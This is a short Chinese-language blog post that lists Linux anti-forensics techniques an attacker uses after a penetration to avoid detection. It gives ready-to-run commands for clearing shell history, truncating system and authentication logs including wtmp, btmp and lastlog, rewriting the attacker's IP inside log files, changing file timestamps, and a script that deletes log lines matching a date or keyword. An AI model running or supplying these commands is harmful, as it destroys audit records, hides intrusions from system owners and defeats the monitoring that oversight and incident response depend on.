Life has its own fate, and meeting may not be accidental.

0%

Linux痕迹清理

在渗透完成之后,为了减少被发现和追溯的概率,攻击者有必要清除自己的攻击痕迹,本文对Linux上清理痕迹的方式做一个总结。(可能不全,只汇总了最多的几种。可能没有做绝)

history清理

1
vim ~/.bash_history
2
history -c

日志清理

1
echo > /var/log/syslog;echo > /var/log/messages;echo > /var/log/httpd/access_log;echo > /var/log/httpd/error_log;echo > /var/log/xferlog;echo > /var/log/secure;echo > /var/log/auth.log;echo > /var/log/user.log;echo > /var/log/wtmp;echo > /var/log/lastlog;echo > /var/log/btmp;echo > /var/run/utmp ;history -c
2
3
echo | tee /var/log/syslog /var/log/messages /var/log/httpd/access_log /var/log/httpd/error_log /var/log/xferlog /var/log/secure /var/log/auth.log /var/log/user.log /var/log/wtmp /var/log/lastlog /var/log/btmp /var/run/utmp > /dev/null
4
history -c

匹配字符更换IP

1
sed -i "s/132.23.11.x/ 192.7.22.12/g" `grep 132.23.11.x -rl /var/log`

修改文件时间

1
touch -r A.php B.php;history -c
2
B文件改为A文件时间
3
touch -d "2021-03-29 14:01:22" 1.txt;history -c
4
修改文件时间

删除匹配时间或者其他关键词的行

1
[[email protected] log]# sh delect.sh 2022-06-01
2
delect.sh:
3
4
#!/bin/bash
5
for f in `grep "$1" -rl /var/log`
6
do
7
 tmp=$(sed -e /$1/d $f);
8
 printf "%s" "$tmp" > $f
9
done ;